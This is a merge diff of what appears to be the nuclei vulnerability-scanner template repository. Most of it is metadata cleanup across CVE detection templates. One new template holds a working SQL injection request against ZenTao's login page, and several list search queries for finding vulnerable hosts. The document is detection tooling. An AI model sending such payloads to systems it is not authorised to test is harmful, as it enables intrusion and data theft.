Merge branch 'master' into patch-1

.new-additions

@@ -1,25 +1,33 @@
-cves/2017/CVE-2017-11586.yaml
+cnvd/2022/CNVD-2022-42853.yaml
-cves/2017/CVE-2017-11629.yaml
+cves/2014/CVE-2014-8676.yaml
-cves/2019/CVE-2019-14530.yaml
+cves/2015/CVE-2015-7245.yaml
-cves/2020/CVE-2020-17526.yaml
+cves/2018/CVE-2018-16139.yaml
-cves/2020/CVE-2020-5191.yaml
+cves/2020/CVE-2020-13258.yaml
-cves/2020/CVE-2020-5192.yaml
+cves/2021/CVE-2021-35380.yaml
-cves/2022/CVE-2022-2383.yaml
+cves/2021/CVE-2021-42663.yaml
-cves/2022/CVE-2022-32770.yaml
+cves/2021/CVE-2021-42667.yaml
-cves/2022/CVE-2022-32771.yaml
+cves/2022/CVE-2022-2376.yaml
-cves/2022/CVE-2022-32772.yaml
+cves/2022/CVE-2022-23854.yaml
-cves/2022/CVE-2022-34576.yaml
+cves/2022/CVE-2022-29004.yaml
-exposed-panels/adobe/aem-crx-package-manager.yaml
+cves/2022/CVE-2022-29005.yaml
-exposed-panels/adobe/aem-sling-login.yaml
+cves/2022/CVE-2022-31474.yaml
-exposed-panels/icc-pro-login.yaml
+cves/2022/CVE-2022-35405.yaml
-misconfiguration/aem/aem-crx-browser.yaml
+cves/2022/CVE-2022-36642.yaml
-misconfiguration/aem/aem-crx-namespace.yaml
+cves/2022/CVE-2022-37299.yaml
-misconfiguration/aem/aem-crx-search.yaml
+default-logins/3com/3com-nj2000-default-login.yaml
-misconfiguration/aem/aem-disk-usage.yaml
+exposed-panels/appsmith-web-login.yaml
-misconfiguration/aem/aem-explorer-nodetypes.yaml
+exposed-panels/corebos-panel.yaml
-misconfiguration/aem/aem-external-link-checker.yaml
+exposed-panels/cvent-panel-detect.yaml
-misconfiguration/aem/aem-misc-admin.yaml
+exposed-panels/omniampx-panel.yaml
-misconfiguration/aem/aem-offloading-browser.yaml
+exposed-panels/v2924-admin-panel.yaml
-misconfiguration/aem/aem-security-users.yaml
+exposures/logs/redis-exception-error.yaml
-misconfiguration/aem/aem-sling-userinfo.yaml
+exposures/logs/webalizer-xtended-stats.yaml
-takeovers/uservoice-takeover.yaml
+misconfiguration/aws-xray-application.yaml
+misconfiguration/corebos-htaccess.yaml
+misconfiguration/ec2-instance-information.yaml
+misconfiguration/graphql/graphql-playground.yaml
+misconfiguration/hivequeue-agent.yaml
+misconfiguration/server-status.yaml
+technologies/jhipster-detect.yaml
+technologies/openssl-detect.yaml
+vulnerabilities/videoxpert-lfi.yaml

README.md

@@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
 
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |  1388 | daffainfo     |   630 | cves             |  1363 | info     |  1450 | http    |  3773 |
+| cve       |  1414 | daffainfo     |   630 | cves             |  1389 | info     |  1463 | http    |  3823 |
-| panel     |   642 | dhiyaneshdk   |   558 | exposed-panels   |   649 | high     |   974 | file    |    76 |
+| panel     |   649 | dhiyaneshdk   |   577 | exposed-panels   |   656 | high     |  1000 | file    |    76 |
-| edb       |   548 | pikpikcu      |   326 | vulnerabilities  |   510 | medium   |   811 | network |    51 |
+| edb       |   557 | pikpikcu      |   326 | vulnerabilities  |   510 | medium   |   811 | network |    51 |
-| lfi       |   496 | pdteam        |   269 | technologies     |   278 | critical |   469 | dns     |    17 |
+| lfi       |   500 | pdteam        |   269 | technologies     |   280 | critical |   475 | dns     |    17 |
-| xss       |   472 | geeknik       |   187 | exposures        |   273 | low      |   219 |         |       |
+| xss       |   486 | geeknik       |   187 | exposures        |   273 | low      |   221 |         |       |
-| wordpress |   415 | dwisiswant0   |   169 | token-spray      |   230 | unknown  |     7 |         |       |
+| wordpress |   417 | dwisiswant0   |   169 | misconfiguration |   231 | unknown  |    10 |         |       |
-| exposure  |   394 | 0x_akoko      |   158 | misconfiguration |   217 |          |       |         |       |
+| exposure  |   404 | 0x_akoko      |   162 | token-spray      |   230 |          |       |         |       |
-| cve2021   |   343 | princechaddha |   150 | workflows        |   189 |          |       |         |       |
+| cve2021   |   350 | princechaddha |   150 | workflows        |   189 |          |       |         |       |
-| rce       |   335 | pussycat0x    |   133 | default-logins   |   102 |          |       |         |       |
+| rce       |   335 | ritikchaddha  |   135 | default-logins   |   102 |          |       |         |       |
-| wp-plugin |   312 | ritikchaddha  |   130 | file             |    76 |          |       |         |       |
+| wp-plugin |   314 | pussycat0x    |   133 | file             |    76 |          |       |         |       |
 
-**294 directories, 4145 files**.
+**295 directories, 4195 files**.
 
 </td>
 </tr>

TOP-10.md

@@ -1,12 +1,12 @@
 |    TAG    | COUNT |    AUTHOR     | COUNT |    DIRECTORY     | COUNT | SEVERITY | COUNT |  TYPE   | COUNT |
 |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
-| cve       |  1388 | daffainfo     |   630 | cves             |  1363 | info     |  1450 | http    |  3773 |
+| cve       |  1414 | daffainfo     |   630 | cves             |  1389 | info     |  1463 | http    |  3823 |
-| panel     |   642 | dhiyaneshdk   |   558 | exposed-panels   |   649 | high     |   974 | file    |    76 |
+| panel     |   649 | dhiyaneshdk   |   577 | exposed-panels   |   656 | high     |  1000 | file    |    76 |
-| edb       |   548 | pikpikcu      |   326 | vulnerabilities  |   510 | medium   |   811 | network |    51 |
+| edb       |   557 | pikpikcu      |   326 | vulnerabilities  |   510 | medium   |   811 | network |    51 |
-| lfi       |   496 | pdteam        |   269 | technologies     |   278 | critical |   469 | dns     |    17 |
+| lfi       |   500 | pdteam        |   269 | technologies     |   280 | critical |   475 | dns     |    17 |
-| xss       |   472 | geeknik       |   187 | exposures        |   273 | low      |   219 |         |       |
+| xss       |   486 | geeknik       |   187 | exposures        |   273 | low      |   221 |         |       |
-| wordpress |   415 | dwisiswant0   |   169 | token-spray      |   230 | unknown  |     7 |         |       |
+| wordpress |   417 | dwisiswant0   |   169 | misconfiguration |   231 | unknown  |    10 |         |       |
-| exposure  |   394 | 0x_akoko      |   158 | misconfiguration |   217 |          |       |         |       |
+| exposure  |   404 | 0x_akoko      |   162 | token-spray      |   230 |          |       |         |       |
-| cve2021   |   343 | princechaddha |   150 | workflows        |   189 |          |       |         |       |
+| cve2021   |   350 | princechaddha |   150 | workflows        |   189 |          |       |         |       |
-| rce       |   335 | pussycat0x    |   133 | default-logins   |   102 |          |       |         |       |
+| rce       |   335 | ritikchaddha  |   135 | default-logins   |   102 |          |       |         |       |
-| wp-plugin |   312 | ritikchaddha  |   130 | file             |    76 |          |       |         |       |
+| wp-plugin |   314 | pussycat0x    |   133 | file             |    76 |          |       |         |       |

cnvd/2021/CNVD-2021-49104.yaml

@@ -13,7 +13,7 @@ info:
     cvss-score: 9.9
     cwe-id: CWE-434
   remediation: Pan Wei has released an update to resolve this vulnerability.
-  tags: pan,micro,cnvd,cnvd2021
+  tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive
 
 requests:
   - raw:

cnvd/2022/CNVD-2022-42853.yaml

@@ -0,0 +1,35 @@
+id: CNVD-2022-42853
+
+info:
+  name: ZenTao CMS - SQL Injection
+  author: ling
+  severity: high
+  description: |
+    Zen Tao has a SQL injection vulnerability. Attackers can exploit the vulnerability to obtain sensitive database information.
+  reference:
+    - https://github.com/z92g/ZentaoSqli/blob/master/CNVD-2022-42853.go
+    - https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853
+  metadata:
+    verified: true
+    shodan-query: http.title:"zentao"
+    fofa-query: "Zentao"
+  tags: cnvd,cnvd2022,zentao,sqli
+
+variables:
+  num: "999999999"
+
+requests:
+  - raw:
+      - |
+        POST /zentao/user-login.html HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+        Referer: {{BaseURL}}/zentao/user-login.html
+
+        account=admin'+and++updatexml(1,concat(0x1,md5({{num}})),1)+and+'1'='1
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'c8c605999f3d8352d7bb792cf3fdb25'

cves/2008/CVE-2008-1059.yaml

@@ -10,7 +10,7 @@ info:
     - https://www.exploit-db.com/exploits/5194
     - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
     - https://nvd.nist.gov/vuln/detail/CVE-2008-1059
-    - http://secunia.com/advisories/29099
+    - https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/
   classification:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5

cves/2008/CVE-2008-1061.yaml

@@ -1,11 +1,11 @@
 id: CVE-2008-1061
 
 info:
-  name: Wordpress Plugin Sniplets 1.2.2 - Cross-Site Scripting
+  name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting
   author: dhiyaneshDK
   severity: medium
   description: |
-    Multiple cross-site scripting (XSS) vulnerabilities in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) text parameter to (a) warning.php, (b) notice.php, and (c) inset.php in view/sniplets/, and possibly (d) modules/execute.php; the (2) url parameter to (e) view/admin/submenu.php; and the (3) page parameter to (f) view/admin/pager.php.
+    WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
   reference:
     - https://www.exploit-db.com/exploits/5194
     - https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
@@ -35,3 +35,6 @@ requests:
       - type: status
         status:
           - 200
+
+
+# Enhanced by mp on 2022/08/31

cves/2011/CVE-2011-2744.yaml

@@ -7,8 +7,8 @@ info:
   description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
   reference:
     - https://www.exploit-db.com/exploits/35945
-    - https://www.cvedetails.com/cve/CVE-2011-2744
     - http://www.openwall.com/lists/oss-security/2011/07/13/6
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-2744
     - http://web.archive.org/web/20140723162411/http://secunia.com/advisories/45184/
   classification:
     cve-id: CVE-2011-2744

cves/2011/CVE-2011-4618.yaml

@@ -1,7 +1,7 @@
 id: CVE-2011-4618
 
 info:
-  name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting
+  name: Advanced Text Widget < 2.0.2 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.

cves/2011/CVE-2011-4624.yaml

@@ -1,7 +1,7 @@
 id: CVE-2011-4624
 
 info:
-  name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting
+  name: GRAND FlAGallery 1.57 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter.

cves/2011/CVE-2011-4804.yaml

@@ -7,9 +7,9 @@ info:
   description: A directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
   reference:
     - https://www.exploit-db.com/exploits/36598
-    - https://www.cvedetails.com/cve/CVE-2011-4804
     - http://web.archive.org/web/20140802122115/http://secunia.com/advisories/46844/
     - http://web.archive.org/web/20210121214308/https://www.securityfocus.com/bid/48944/
+    - https://nvd.nist.gov/vuln/detail/CVE-2011-4804
   remediation: Upgrade to a supported version.
   classification:
     cve-id: CVE-2011-4804

cves/2011/CVE-2011-4926.yaml

@@ -1,7 +1,7 @@
 id: CVE-2011-4926
 
 info:
-  name: Adminimize 1.7.22 - Reflected Cross-Site Scripting
+  name: Adminimize 1.7.22 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.

cves/2011/CVE-2011-5106.yaml

@@ -1,7 +1,7 @@
 id: CVE-2011-5106
 
 info:
-  name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting
+  name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.

cves/2011/CVE-2011-5107.yaml

@@ -1,7 +1,7 @@
 id: CVE-2011-5107
 
 info:
-  name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting
+  name: Alert Before Your Post <= 0.1.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting  vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter.

cves/2011/CVE-2011-5179.yaml

@@ -1,7 +1,7 @@
 id: CVE-2011-5179
 
 info:
-  name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting
+  name: Skysa App Bar 1.04 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.

cves/2011/CVE-2011-5181.yaml

@@ -1,7 +1,7 @@
 id: CVE-2011-5181
 
 info:
-  name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting
+  name: ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.

cves/2011/CVE-2011-5265.yaml

@@ -1,7 +1,7 @@
 id: CVE-2011-5265
 
 info:
-  name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting
+  name: Featurific For WordPress 1.6.2 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter.

cves/2012/CVE-2012-0896.yaml

@@ -7,9 +7,9 @@ info:
   description: An absolute path traversal vulnerability in download.php in the Count Per Day module before 3.1.1 for WordPress allows remote attackers to read arbitrary files via the f parameter.
   reference:
     - https://packetstormsecurity.com/files/108631/
-    - https://www.cvedetails.com/cve/CVE-2012-0896
     - http://web.archive.org/web/20140804110141/http://secunia.com/advisories/47529/
     - http://plugins.trac.wordpress.org/changeset/488883/count-per-day
+    - https://https://nvd.nist.gov/vuln/detail/CVE-2012-0896
   classification:
     cve-id: CVE-2012-0896
   metadata:

cves/2012/CVE-2012-0901.yaml

@@ -1,7 +1,7 @@
 id: CVE-2012-0901
 
 info:
-  name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting
+  name: YouSayToo auto-publishing 1.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter.

cves/2012/CVE-2012-1835.yaml

@@ -1,7 +1,7 @@
 id: CVE-2012-1835
 
 info:
-  name: WordPress Plugin All-in-One Event Calendar 1.4 - Reflected Cross-Site Scripting
+  name: WordPress Plugin All-in-One Event Calendar 1.4 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: Multiple cross-site scripting vulnerabilities in the All-in-One Event Calendar plugin 1.4 and 1.5 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) title parameter to app/view/agenda-widget-form.php; (2) args, (3) title, (4) before_title, or (5) after_title parameter to app/view/agenda-widget.php; (6) button_value parameter to app/view/box_publish_button.php; or (7) msg parameter to /app/view/save_successful.php.

cves/2012/CVE-2012-2371.yaml

@@ -1,7 +1,7 @@
 id: CVE-2012-2371
 
 info:
-  name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting
+  name: WP-FaceThumb 0.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter.

cves/2012/CVE-2012-4242.yaml

@@ -1,7 +1,7 @@
 id: CVE-2012-4242
 
 info:
-  name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting
+  name: WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page.

cves/2012/CVE-2012-4273.yaml

@@ -1,7 +1,7 @@
 id: CVE-2012-4273
 
 info:
-  name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting
+  name: 2 Click Socialmedia Buttons < 0.34 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.

cves/2012/CVE-2012-4768.yaml

@@ -1,7 +1,7 @@
 id: CVE-2012-4768
 
 info:
-  name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting
+  name: WordPress Plugin Download Monitor < 3.3.5.9 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.

cves/2012/CVE-2012-4889.yaml

@@ -1,7 +1,7 @@
 id: CVE-2012-4889
 
 info:
-  name: ManageEngine Firewall Analyzer 7.2 - Reflected Cross Site Scripting
+  name: ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.

cves/2012/CVE-2012-5913.yaml

@@ -1,7 +1,7 @@
 id: CVE-2012-5913
 
 info:
-  name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting
+  name: WordPress Integrator 1.32 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.

cves/2013/CVE-2013-2287.yaml

@@ -1,7 +1,7 @@
 id: CVE-2013-2287
 
 info:
-  name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting
+  name: WordPress Plugin Uploader 1.0.4 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: Multiple cross-site scripting  vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter.

cves/2013/CVE-2013-3526.yaml

@@ -1,7 +1,7 @@
 id: CVE-2013-3526
 
 info:
-  name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting
+  name: WordPress Plugin Traffic Analyzer - 'aoid' Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter."

cves/2013/CVE-2013-4117.yaml

@@ -1,7 +1,7 @@
 id: CVE-2013-4117
 
 info:
-  name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting
+  name: WordPress Plugin Category Grid View Gallery 2.3.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.

cves/2013/CVE-2013-4625.yaml

@@ -1,7 +1,7 @@
 id: CVE-2013-4625
 
 info:
-  name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting
+  name: WordPress Plugin Duplicator < 0.4.5 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting  vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.

cves/2013/CVE-2013-5979.yaml

@@ -8,7 +8,6 @@ info:
   reference:
     - https://www.exploit-db.com/exploits/26955
     - https://nvd.nist.gov/vuln/detail/CVE-2013-5979
-    - https://www.cvedetails.com/cve/CVE-2013-5979
     - https://bugs.launchpad.net/xibo/+bug/1093967
   classification:
     cve-id: CVE-2013-5979

cves/2013/CVE-2013-6281.yaml

@@ -18,7 +18,7 @@ info:
     cve-id: CVE-2013-6281
     cwe-id: CWE-79
   metadata:
-    google-dork: inurl:/wp-content/plugins/dhtmlxspreadsheet
+    google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet
     verified: "true"
   tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin
 

cves/2014/CVE-2014-10037.yaml

@@ -7,7 +7,6 @@ info:
   description: A directory traversal vulnerability in DomPHP 0.83 and earlier allows remote attackers to have unspecified impacts via a .. (dot dot) in the url parameter to photoalbum/index.php.
   reference:
     - https://www.exploit-db.com/exploits/30865
-    - https://www.cvedetails.com/cve/CVE-2014-10037
     - https://nvd.nist.gov/vuln/detail/CVE-2014-10037
     - http://www.exploit-db.com/exploits/30865
   classification:

cves/2014/CVE-2014-4513.yaml

@@ -1,7 +1,7 @@
 id: CVE-2014-4513
 
 info:
-  name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting
+  name: ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: Multiple cross-site scripting vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter.

cves/2014/CVE-2014-4535.yaml

@@ -1,7 +1,7 @@
 id: CVE-2014-4535
 
 info:
-  name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting
+  name: Import Legacy Media <= 0.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in the Import Legacy Media plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.
@@ -14,7 +14,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2014-4535
     cwe-id: CWE-79
-  tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss
+  tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth
 
 requests:
   - method: GET

cves/2014/CVE-2014-4536.yaml

@@ -1,7 +1,7 @@
 id: CVE-2014-4536
 
 info:
-  name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected Cross-Site Scripting
+  name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: Multiple cross-site scripting vulnerabilities in tests/notAuto_test_ContactService_pauseCampaign.php in the Infusionsoft Gravity Forms plugin before 1.5.6 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) go, (2) contactId, or (3) campaignId parameter.
@@ -17,7 +17,7 @@ info:
     cwe-id: CWE-79
   metadata:
     google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/"
-  tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss
+  tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth
 
 requests:
   - method: GET

cves/2014/CVE-2014-4539.yaml

@@ -1,7 +1,7 @@
 id: CVE-2014-4539
 
 info:
-  name: Movies <= 0.6 - Unauthenticated Reflected Cross-Site Scripting
+  name: Movies <= 0.6 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in the Movies plugin 0.6 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the filename parameter to getid3/demos/demo.mimeonly.php.
@@ -14,7 +14,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2014-4539
     cwe-id: CWE-79
-  tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014
+  tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth
 
 requests:
   - method: GET

cves/2014/CVE-2014-4544.yaml

@@ -1,7 +1,7 @@
 id: CVE-2014-4544
 
 info:
-  name: Podcast Channels < 0.28 - Unauthenticated Reflected Cross-Site Scripting
+  name: Podcast Channels < 0.28 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: The Podcast Channels WordPress plugin was affected by an unauthenticated reflected cross-site scripting security vulnerability.
@@ -14,7 +14,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2014-4544
     cwe-id: CWE-79
-  tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss
+  tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,unauth
 
 requests:
   - method: GET

cves/2014/CVE-2014-4550.yaml

@@ -1,7 +1,7 @@
 id: CVE-2014-4550
 
 info:
-  name: Shortcode Ninja <= 1.4 - Unauthenticated Reflected Cross-Site Scripting
+  name: Shortcode Ninja <= 1.4 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in preview-shortcode-external.php in the Shortcode Ninja plugin 1.4 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the shortcode parameter.
@@ -16,7 +16,7 @@ info:
     cwe-id: CWE-79
   metadata:
     google-query: inurl:"/wp-content/plugins/shortcode-ninja"
-  tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014
+  tags: wordpress,wp-plugin,xss,wpscan,cve,cve2014,unauth
 
 requests:
   - method: GET

cves/2014/CVE-2014-4558.yaml

@@ -1,7 +1,7 @@
 id: CVE-2014-4558
 
 info:
-  name: WooCommerce Swipe <= 2.7.1 - Unauthenticated Reflected Cross-Site Scripting
+  name: WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in test-plugin.php in the Swipe Checkout for WooCommerce plugin 2.7.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the api_url parameter.
@@ -14,7 +14,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2014-4558
     cwe-id: CWE-79
-  tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce
+  tags: wpscan,cve,cve2014,wordpress,wp-plugin,xss,woocommerce,unauth
 
 requests:
   - method: GET

cves/2014/CVE-2014-4561.yaml

@@ -1,7 +1,7 @@
 id: CVE-2014-4561
 
 info:
-  name: Ultimate Weather Plugin <= 1.0 - Unauthenticated Reflected Cross-Site Scripting
+  name: Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: The ultimate-weather plugin 1.0 for WordPress contains a cross-site scripting vulnerability.
@@ -14,7 +14,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2014-4561
     cwe-id: CWE-79
-  tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan
+  tags: cve,cve2014,wordpress,wp-plugin,xss,weather,wpscan,unauth
 
 requests:
   - method: GET

cves/2014/CVE-2014-4592.yaml

@@ -1,7 +1,7 @@
 id: CVE-2014-4592
 
 info:
-  name: WP Planet <= 0.1 - Unauthenticated Reflected Cross-Site Scripting
+  name: WP Planet <= 0.1 - Cross-Site Scripting
   author: daffainfo
   severity: medium
   description: A cross-site scripting vulnerability in rss.class/scripts/magpie_debug.php in the WP-Planet plugin 0.1 and earlier for WordPress allows remote attackers to inject arbitrary web script or HTML via the url parameter.
@@ -16,7 +16,7 @@ info:
     cwe-id: CWE-79
   metadata:
     google-query: inurl:"/wp-content/plugins/wp-planet"
-  tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve
+  tags: cve2014,wordpress,wp-plugin,xss,wpscan,cve,unauth
 
 requests:
   - method: GET

cves/2014/CVE-2014-5368.yaml

@@ -8,7 +8,6 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2014-5368
     - https://www.exploit-db.com/exploits/39287
-    - https://www.cvedetails.com/cve/CVE-2014-5368
     - http://seclists.org/oss-sec/2014/q3/417
   classification:
     cve-id: CVE-2014-5368

cves/2014/CVE-2014-8676.yaml

@@ -0,0 +1,34 @@
+id: CVE-2014-8676
+
+info:
+  name: Simple Online Planning Tool 1.3.2 - Directory Traversal
+  author: 0x_Akoko
+  severity: medium
+  description: |
+    Directory traversal vulnerability in the file_get_contents function in SOPlanning 1.32 and earlier allows remote attackers to determine the existence of arbitrary files via a .. (dot dot) in a URL path parameter.
+  reference:
+    - https://packetstormsecurity.com/files/132654/Simple-Online-Planning-Tool-1.3.2-XSS-SQL-Injection-Traversal.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2014-8676
+    - https://www.exploit-db.com/exploits/37604/
